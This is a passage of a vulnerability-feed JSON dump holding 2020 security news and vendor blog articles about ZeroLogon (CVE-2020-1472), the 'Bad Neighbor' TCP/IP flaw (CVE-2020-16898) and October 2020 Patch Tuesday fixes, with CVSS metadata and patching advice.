"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16898", "CVE-2020-16947"], "modified": 
"2020-10-13T20:10:36", "id": "KREBS:7252221B56E65C46DEF83A6DDC0B70FB", "href": "https://krebsonsecurity.com/2020/10/microsoft-patch-tuesday-october-2020-edition/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-24T17:42:40", "description": "**Microsoft** warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in **Windows Server** systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft's warning comes just days after the **U.S. Department of Homeland Security** issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest.\n\n\n\nDHS's **Cybersecurity and Infrastructure Agency** (CISA) said [in the directive](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>) that it expected imminent exploitation of the flaw -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) and dubbed "ZeroLogon" -- because exploit code which can be used to take advantage of it [was circulating online](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>).\n\nLast night, Microsoft's Security Intelligence unit [tweeted](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) that the company is "tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability."\n\n"We have observed attacks where public exploits have been incorporated into attacker playbooks," Microsoft said. 
"We strongly recommend customers to immediately apply security updates."\n\nMicrosoft [released a patch for the vulnerability in August](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>), but it is not uncommon for businesses to delay deploying updates for days or weeks while testing to ensure the fixes do not interfere with or disrupt specific applications and software.\n\nCVE-2020-1472 earned Microsoft's most-dire "critical" severity rating, meaning attackers can exploit it with little or no help from users. The flaw is present in most supported versions of Windows Server, from **Server 2008** through **Server 2019**.\n\nThe vulnerability could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n**Scott Caveza**, research engineering manager at security firm [Tenable](<https://www.tenable.com>), said several samples of malicious .NET executables with the filename \u2018SharpZeroLogon.exe\u2019 have been uploaded to VirusTotal, a service owned by Google that scans suspicious files against dozens of antivirus products.\n\n"Given the flaw is easily exploitable and would allow an attacker to completely take over a Windows domain, it should come as no surprise that we\u2019re seeing attacks in the wild," Caveza said. "Administrators should prioritize patching this flaw as soon as possible. 
Based on the rapid speed of exploitation already, we anticipate this flaw will be a popular choice amongst attackers and integrated into malicious campaigns."", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-24T17:00:51", "type": "krebs", "title": "Microsoft: Attackers Exploiting \u2018ZeroLogon\u2019 Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T17:00:51", "id": "KREBS:952ACEBFD55EBD076910C6B233491883", "href": "https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2020-10-21T08:41:22", "description": "\n\nMicrosoft brings us an October's Update Tuesday with 87 vulnerabilities, a sub-100 number we haven't experienced in quite some time. To further add to this oddity, there are no Browser-based vulnerabilities to mention and the arrival of a new Adobe Flash vulnerability [CVE-2020-9746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200012>). 
Despite this month's lower numbers, there are some precautions we should all take to remediate our environments quickly and effectively.\n\n## Starting with Microsoft Windows\n\nAs usual, whenever possible, it's better to prioritize updates against the Windows operating system. Coming in at 53 of the 87 vulnerabilities, patching the OS knocks out 60% of the vulnerabilities listed along with over half of the critical remote code execution vulnerabilities resolved today.\n\n### [Microsoft CVE-2020-16898: Microsoft TCP/IP Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)\n\nWith a CVSS score of 9.8 and marked as \"Exploitation More Likely\", this vulnerability grants the ability to execute code on target Windows 10 (version 1709+), Windows Server 2019, and Windows Server version 1903+ systems due to improper handling of ICMPv6 Router Advertisement packets.\n\nLuckily, if immediate patching isn't viable due to reboot scheduling, [Microsoft provides PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems. The PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\n\n### [Microsoft CVE-2020-16896: Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16896>)\n\nRDP has been a [focal point for some of recent attacks](<https://blog.rapid7.com/2020/10/09/psa-increase-in-rdp-attacks-means-its-time-to-mind-your-rdps-and-qs/>) (e.g. BlueKeep), so whenever Microsoft provides another fix within that realm, it's prudent to make note of some specifics. 
CVE-2020-16896 is an information disclosure vulnerability where, when successfully exploited, allows unauthorized read access to the Windows RDP server process.\n\nThis RDP vulnerability, like previous ones of late, affects all supported Windows operating systems, and can continue to be mitigated by practices such as enabling Network Level Authentication (NLA) or by blocking TCP port 3389 at the enterprise perimeter firewall.\n\n### [Microsoft CVE-2020-16911: GDI+ Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>)\n\nCritical remote code execution vulnerability CVE-2020-16911 leverages how the Windows Graphics Device Interface (GDI) handles objects in memory. A successful exploitation allows the attacker to install programs and/or create new accounts under the same user rights as the user who triggered this vulnerability.\n\nA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content.\n\nUnlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\n\n### \n\n## Moving on to Microsoft SharePoint\n\nContinuing last month's trend, there are more SharePoint-related vulnerabilities being addressed this month (10 of them) than past months. If relevant in your environment, the respective KBs for your version of SharePoint should be the next batch of patches to prioritize. 
Below are some highlights of the higher CVSS-scored ones.\n\n### Microsoft SharePoint Remote Code Execution Vulnerabilities ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>), [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>))\n\nWith Proof-of-Concept exploits starting to flow out in the wild, bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\n\nCVE-2020-16951 and CVE-2020-16952 are remote code execution vulnerabilities that exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\nFor more in-depth attacker perspective, visit [AttackerKB's take on CVE-2020-16952.](<https://attackerkb.com/topics/4yGC4tLK2x/cve-2020-16952#rapid7-analysis>)\n\n### Microsoft SharePoint Reflective XSS Vulnerabilities ([CVE-2020-16944](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16944>), [CVE-2020-16945](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16945>), [CVE-2020-16946](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16946>))\n\nThe last set of notable SharePoint vulnerabilities this month are three CVSS 8.7 spoofing vulnerabilities. Requiring a user to click a specially-crafted URL within targeted SharePoint Web App site, a successful exploitation from those means allows the attacker to perform cross-site scripting attacks and/or run scripts in the security context of the user.\n\n## Closing October's Update Tuesday journey with Microsoft Office\n\nWhile we always expect Office-based vulnerabilities every month, two vulnerabilities particularly stood out. 
In both cases, the Preview Pane is considered an attack vector, which lowers the barriers to entry a bit.\n\n### [Microsoft CVE-2020-16947: Outlook Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)\n\nA critical remote code execution vulnerability for Outlook 2016, Office 2019 and Microsoft 365 apps only, CVE-2020-16947 has the potential to allow an attacker to run arbitrary code in the context of the user. The attacker could then install programs or create new accounts with full user rights.\n\nWhile the details behind this vulnerability feels standard from Microsoft's description, it actively acknowledges that the Preview Pane is an attack vector, and that in itself, attracts some attention.\n\n### [Microsoft CVE-2020-16949: Outlook Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16949>)\n\nCVE-2020-16949 is an Outlook vulnerability that affects more versions than the list around CVE-2020-14947 including Outlook 2010 and Outlook 2013. This vulnerability, however, reads differently in that this denial of service vulnerability only requires that a specially-crafted email be sent. 
When paired with the fact that this vulnerability is marked with the Preview Pane as an attack vector, just like CVE-2020-16947, suggests giving Outlook its fair share of attention this month.\n\n\n\n________Note: Graph data is reflective of data presented by Microsoft's CVRF at the time of writing.________", "cvss3": {}, "published": "2020-10-13T23:25:39", "type": "rapid7blog", "title": "Patch Tuesday - October 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14947", "CVE-2020-16896", "CVE-2020-16898", "CVE-2020-16911", "CVE-2020-16944", "CVE-2020-16945", "CVE-2020-16946", "CVE-2020-16947", "CVE-2020-16949", "CVE-2020-16951", "CVE-2020-16952", "CVE-2020-9746"], "modified": "2020-10-13T23:25:39", "id": "RAPID7BLOG:801DC63ED24DFFC38FE4775AAD07ADDB", "href": "https://blog.rapid7.com/2020/10/13/patch-tuesday-october-2020/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-28T04:47:53", "description": "\n\nIf you\u2019re in the U.S. and were waiting for an \u201cOctober surprise\u201d, look no further than [CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) which is a remote code execution (RCE) vulnerability in the Windows TCP/IP stack, or what our own [Tod Beardsley](<https://twitter.com/todb>) likes to call \u201cexploiting poor implementations of [core IETF RFC](<https://ietf.org/standards/rfcs/>)s\u201d.\n\nThe vulnerability arises when the TCP/IP stack does not properly handle ICMPv6 Router Advertisement packets. Successful exploitation requires sending specially-crafted ICMPv6 Router Advertisement packets to a remote Windows computer and could give an attacker the ability to execute code on the target server or client. 
CVE-2020-16898 carries a CVSSv3 base score of 9.8.\n\nOur talented crew of Rapid7 vulnerability researchers have a [technical analysis up on AttackerKB](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor>), and security firm McAfee has their own technical analysis of CVE-2020-16898 [available here](<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>), which we recommend reading. Their research and engineering teams note that the Microsoft-provided exploit is \u201cboth extremely simple and perfectly reliable[, and] results in an immediate [Blue Screen of Death] (BSoD)\u201d.\n\nBefore we go any further, we would like to strongly encourage you to patch this vulnerability if you are running Windows 10, Windows Server 2019, or Windows Server Core 1903, 1909, or 2004. You really don\u2019t want to mess around when the word \u201cwormable\u201d is being used and so many eyes are on the non-BSOD prize of a fully-working RCE. If you cannot patch, consider disabling ICMPv6 Recursive DNS Server (RDNSS) as a workaround (which is, unfortunately, only available for Windows 1709 and above) via the PowerShell command:\n \n \n netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable\n \n\n## More Like \u201cSlightly Annoying Neighbors\u201d (For Now)\n\nAs noted above, there are many folks who have access to the known BSoD exploit and scads more burning through cases of Mountain Dew to try to replicate the BSoD on their own (which is a common first step when attempting to get a repeatable remote code execution exploit to work). 
Weaponizing this and other BSoD=>RCE bugs is [not exactly trivial](<https://attackerkb.com/topics/71QrpupdZO/dejablue-rdp-heap-overflow?referrer=16898>), especially on modern operating systems like the ones impacted by this weakness.\n\nIn the short term (and, possibly long term) you should be more wary of disruption and distraction campaigns using this weakness, especially since IPv6 is very likely running on your internal network (where Bad Neighbor attacks are really most likely to occur) without you being aware of it.\n\n## What More Can You Do?\n\n[InsightVM](<https://www.rapid7.com/products/insightvm/>) and Nexpose can assess their exposure to CVE-2020-16898 with an authenticated check.\n\nSee [Microsoft\u2019s advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>) for further details and keep an eye on [the AttackerKB Bad Neighbor topic](<https://attackerkb.com/topics/17lFRTT1DO/cve-2020-16898-aka-bad-neighbor>).\n\nDefenders may also find the detection logic and an [available Suricata rule](<https://github.com/advanced-threat-research/CVE-2020-16898>) (courtesy of McAfee\u2019s threat detection team) quite useful.\n\nDon\u2019t be equally surprised in November, December, January, or any of the other calendar months. You and your organization should really be prepared to have between 1-5 critical \u201cpatch now\u201d events each month for the foreseeable future. 
That may seem disruptive, but the spate of critical bugs in core business and remote access technologies has become the new normal and the only way to handle it is to make it part of the plan.\n\n## Updates\n\nOn 2020-10-14 Juniper Networks [released an advisory](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11049&cat=SIRT_1&actp=LIST>) noting that the following JunOS versions are vulnerable to CVE-2020-16898 if the DHCPv6 Relay Agent feature is configured/enabled via `[forwarding-options dhcp-relay dhcpv6]`:\n\n * 12.3 versions prior to 12.3R12-S15;\n * 12.3X48 versions prior to 12.3X48-D95;\n * 14.1X53 versions prior to 14.1X53-D53;\n * 15.1 versions prior to 15.1R7-S6;\n * 15.1X49 versions prior to 15.1X49-D200;\n * 15.1X53 versions prior to 15.1X53-D593;\n * 16.1 versions prior to 16.1R7-S7;\n * 16.2 versions prior to 16.2R2-S11;\n * 17.1 versions prior to 17.1R2-S11, 17.1R3-S2;\n * 17.2 versions prior to 17.2R3-S3;\n * 17.2X75 versions prior to 17.2X75-D44;\n * 17.3 versions prior to 17.3R3-S7;\n * 17.4 versions prior to 17.4R2-S9, 17.4R3;\n * 18.1 versions prior to 18.1R3-S9;\n * 18.2 versions prior to 18.2R2-S6, 18.2R3-S2;\n * 18.2X75 versions prior to 18.2X75-D12, 18.2X75-D33, 18.2X75-D435, 18.2X75-D60;\n * 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1;\n * 18.4 versions prior to 18.4R1-S5, 18.4R2-S3, 18.4R3;\n * 19.1 versions prior to 19.1R1-S4, 19.1R2;\n * 19.2 versions prior to 19.2R1-S3, 19.2R2;\n * 19.3 versions prior to 19.3R2.\n\nThere are no workarounds for this issue.\n\nJuniper has assigned a separate CVE \u2014 CVE-2020-1656 \u2014 for this vulnerability.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2020-10-14T02:38:11", "type": "rapid7blog", "title": "There Goes The Neighborhood: Dealing With CVE-2020-16898 (and CVE-2020-1656) (aka\"Bad Neighbor\")", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1656", 
"CVE-2020-16898"], "modified": "2020-10-14T02:38:11", "id": "RAPID7BLOG:0E497787F9B42FC1D11439220E6A9D3F", "href": "https://blog.rapid7.com/2020/10/14/there-goes-the-neighborhood-dealing-with-cve-2020-16898-a-k-a-bad-neighbor/", "cvss": {"score": 5.8, "vector": "AV:A/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-19T14:41:15", "description": "\n\n[Windows Server 2008 and 2008 R2](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>) reached their end of life (EOL) on Jan. 14, 2020. What does that mean in practice? Well, any instances running these versions of Windows Server are no longer supported by Microsoft\u2014no more automated fixes, updates, or technical assistance. \n\nFrom a security standpoint, any exploits that appear after Jan. 14 that affect these specific versions of Windows will not likely be addressed for the vast majority of installations. Though there have been [exceptions to end of support](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/revised-end-of-service-date-for-windows-10-version-1803-may-11/ba-p/1614136>) under unusual circumstances, such as the extension of support for Windows 10 in light of the unprecedented COVID-19 pandemic, such exceptions shouldn\u2019t be expected to be the norm.\n\nThrough a sampling of some of our data, we realized that even as of the date of this post, there were many instances of Windows Server 2008 still running in the wild\u2014and by extension, associated variations of dependent software, such as Microsoft Internet Information Services (IIS) version 7.0 and 7.5. \nWe took a more systematic look at the prevalence of the different versions of Windows Server that are floating out on the open internet. 
We performed a number of internet-wide scans using [Project Sonar](<https://www.rapid7.com/research/project-sonar/>), and fingerprinted the returned data using [Recog](<https://blog.rapid7.com/2020/04/08/self-isolation-home-networking-and-open-source-recog-and-rumble/>), when possible, to enable us to identify specific versions of Windows Server.\n\n\n\nWhat we found was alarming: Over the course of September 2020, 59% of all uniquely observed instances of Windows Server were unsupported, while 41% were supported. However, the uneven balance of dangerous versus safe services that we observed is not terribly unusual. It seems to be more the norm that the preponderance of actively running services on the internet are outdated, unsupported, improperly patched, or insecure. For examples, see any number of Rapid7\u2019s past blog posts, including reflections on the state of [PHP](<https://blog.rapid7.com/2018/12/17/charting-the-forthcoming-phpocalypse-in-2019/>) and [Microsoft Exchange](<https://blog.rapid7.com/2020/09/29/microsoft-exchange-2010-end-of-support-and-overall-patching-study/>).\n\nWe were also able to identify the countries in which these unsupported Windows Server instances were located, and determined (without much surprise) that the heaviest concentrations were in the United States and China.\n\n\n\nOn the other hand, the heaviest concentrations of _supported_ versions of Windows Server were _also _the United States and China, though if we examine the coloration scale more closely, we do see that the numbers for unsupported versions are significantly larger than supported.\n\n\n\nFor a more direct comparison of supported versions of Windows Server against unsupported versions within countries, we calculated the difference between the two classes within each country. This allowed us to get past a consideration of the raw prevalence of Windows Server within particular countries. 
In this case, we found that Poland manifested itself particularly well, with the most dramatic difference in terms of absolute counts of supported over unsupported versions, while the United States appeared the worst off, with nearly half a million more instances of unsupported versions than supported.\n\n\n\nThere is also observable variation between hosting service providers within countries in terms of unsupported Windows Server instances. For instance, we can note that Hangzhou Alibaba Advertising hosts by a wide margin the most instances of unsupported Windows Server instances within China.\n\n\n\nWhile we can assert that the state of Windows Server security across the internet in this latest month doesn\u2019t look great, there does appear to be some level of progress. Over the past several months, we have observed a notable decline in the number of unsupported variants of Windows Server - including Windows Server 2003, 2008, and their various release candidates.\n\n\n\nThe decline in usage of Server 2008 and Server 2008 R2 amounted to approximately 40,000 and over 2,000,000 instances, respectively. The net decline that we observed in Windows Server instances does comport with what other internet researchers have observed as well. For instance, Netcraft noted a [shift from Windows web servers to OpenResty](<https://news.netcraft.com/archives/category/web-server-survey/>). There was an unusual spike in counts (though not terribly significant in terms of absolute numbers) for Server 2003 R2 that we noticed and are still looking into, though at this time, our best guess is this is simply a manifestation of the somewhat stochastic spirit of Sonar.\n\n\n\nHow severe is all this? Well, it really depends on the types of vulnerabilities and exploits that crop up and how Microsoft decides to respond. 
\n\nFor instance, in early September, the [Zerologon (CVE-2020-1472) vulnerability](<https://blog.rapid7.com/2020/09/14/cve-2020-1472-zerologon-critical-privilege-escalation/>) was publicly disclosed, with a whopping CVSSv3 rating of 10.0 (i.e., as bad as it gets). This allowed for the elevation of privileges up to a domain admin level by exploiting a cryptographic weakness in the [Netlogon Remote Protocol](<https://www.secura.com/blog/zero-logon>). The vulnerability affected a number of versions of Windows Server. Microsoft addressed the Netlogon vulnerability with a round of patches in August, which fortuitously included a patch for Windows Server 2008 R2 SP 1 (based on the information released and some testing by Rapid7 Principal Security Researcher Tom Sellers, it seems that Windows Server 2008 is not susceptible to [Zerologon](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)). \n\nWithout the good graces of Microsoft, the Zerologon vulnerability could have become a perpetual vulnerability for millions of Windows Server 2008 R2 instances that remain open on the public internet. Imagine the prospecting opportunities for malicious actors yearning for domain admin access to critical enterprise production systems. Quite frankly, given the recency of the patch and the tendency for patches to be slow in application, it wouldn\u2019t be surprising at all if there are many extant Windows Server 2008 instances that remain unpatched and severely exploitable, presenting ripe opportunities for mayhem.\n\nHere are some key actions that can be performed to minimize the risk posed by the usage of unsupported Windows Server versions:\n\n * Stop using unsupported Windows Server versions. 
Migrate to a more recent and active version of Windows Server (or, if you are to follow Microsoft\u2019s advice, simply migrate to the cloud and embrace [Microsoft Azure](<https://www.microsoft.com/en-us/cloud-platform/windows-server-2008>)).\n * Remove public access to unsupported versions of Windows Server.\n * If there remains a need to continue using unsupported versions, at the very least, apply past available patches. This doesn\u2019t fully address the concerns manifesting from using unsupported versions, such as newly discovered zero-day exploits, but it does at least mitigate some past lingering risks.\n", "cvss3": {}, "published": "2020-10-19T13:06:38", "type": "rapid7blog", "title": "Are You Still Running End-of-Life Windows Servers?", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-19T13:06:38", "id": "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "href": "https://blog.rapid7.com/2020/10/19/are-you-still-running-end-of-life-windows-servers/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-10-14T22:23:27", "description": "UPDATE\n\nThe \u201cperfect\u201d Windows vulnerability known as the Zerologon bug is getting a patch assist from two non-Microsoft sources, as they strive to fill in the gaps that the official fix doesn\u2019t address.\n\nThey roll out as Microsoft announced that it is tracking active exploitation in the wild. 
\u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nBoth Samba and 0patch have issued fixes for CVE-2020-1472, a privilege-escalation bug which, [as previously reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user- and machine-authentication.\n\nExploiting the bug allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. A proof-of-concept exploit [was just released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale.\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>) published earlier this month.\n\nMicrosoft did issue a [patch for the flaw in August](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>), during its regularly scheduled Patch Tuesday updates. However, not all systems are compatible with the fix, according to Mitja Kolsec, CEO and co-founder at 0patch, which issued a \u201cmicropatch\u201d of its own for the bug.\n\n\u201cOur micropatch was made for Windows Server 2008 R2, which reached end-of-support this January and stopped receiving Windows updates,\u201d Kolsec told Threatpost. 
\u201cMany organizations are still using this server and the only way for it to get extended security updates from Microsoft was to move it to Azure (cloud) \u2014 which is an unacceptable option for most organizations.\u201d\n\nThe micropatch is logically identical to Microsoft\u2019s fix, he explained in a recent [blog post](<https://blog.0patch.com/2020/09/micropatch-for-zerologon-perfect.html>): \u201cWe injected it in function NetrServerAuthenticate3 in roughly the same place where Microsoft added the call to NlIsChallengeCredentialPairVulnerable, but since the latter doesn\u2019t exist in old versions of netlogon.dll, we had to implement its logic in our patch.\u201d\n\n0patch is also porting the micropatch to various still-supported Windows Servers for customers who for various reasons can\u2019t apply the Microsoft patch, he added.\n\nMeanwhile, it turns out that Samba, a file-sharing utility for swapping materials between Linux and Windows systems, also relies on the Netlogon protocol, and thus suffers from the vulnerability.\n\nThe bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC), it said in [an advisory](<https://www.samba.org/samba/security/CVE-2020-1472.html>) this week. It added, \u201cinstallations running Samba as a file server only are not directly affected by this flaw, though they may need configuration changes to continue to talk to domain controllers.\u201d\n\nThe company noted that versions 4.8 and above of Samba are not vulnerable unless they have the smb.conf lines \u2018server schannel = no\u2019 or \u2018server schannel = auto\u2019. Samba versions 4.7 and below are vulnerable unless they have \u2018server schannel = yes\u2019 in the smb.conf.\n\nLast Friday, the U.S. Cybersecurity and Infrastructure Security Agency [issued an emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) for federal agencies to patch against the bug. 
Federal agencies that haven\u2019t patched their Windows Servers against the Zerologon vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation. And in light of the active, in-the-wild exploitation flagged by Microsoft, patching should be at the top of the to-do list for all organizations.\n\n> Microsoft is actively tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon EoP vulnerability, dubbed Zerologon. We have observed attacks where public exploits have been incorporated into attacker playbooks.\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [September 24, 2020](<https://twitter.com/MsftSecIntel/status/1308941504707063808?ref_src=twsrc%5Etfw>)\n\n_**This story was updated at 11 a.m. ET on Sept. 23 to include information on active exploitation.**_\n", "cvss3": {}, "published": "2020-09-23T21:05:54", "type": "threatpost", "title": "Zerologon Patches Roll Out Beyond Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-09-23T21:05:54", "id": "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "href": "https://threatpost.com/zerologon-patches-beyond-microsoft/159513/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:08:35", "description": "Microsoft is warning that an Iranian nation-state actor is now actively exploiting the Zerologon vulnerability (CVE-2020-1472), adding fuel to the fire as the severe flaw continues to plague businesses.\n\nThe [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which Microsoft calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm) has historically [targeted government victims](<https://threatpost.com/muddywater-apt-custom-tools/144193/>) in the Middle East to exfiltrate data. 
Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\n\u201cMSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (Zerologon) in active campaigns over the last 2 weeks,\u201d according to a [Microsoft tweet on Monday evening](<https://twitter.com/MsftSecIntel/status/1313246337153077250>).\n\nMicrosoft released a patch for the Zerologon vulnerability ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). The bug is located in a core authentication component of Active Directory within the Windows Server OS and the Microsoft Windows Netlogon Remote Protocol (MS-NRPC). [As previously reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), the flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\n[Then, earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on [Github](<https://github.com/dirkjanm/CVE-2020-1472>). This spurred the Secretary of Homeland Security to issue a rare emergency directive, ordering federal agencies to patch their Windows Servers against the flaw by Sept. 
21.\n\nMicrosoft\u2019s alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers 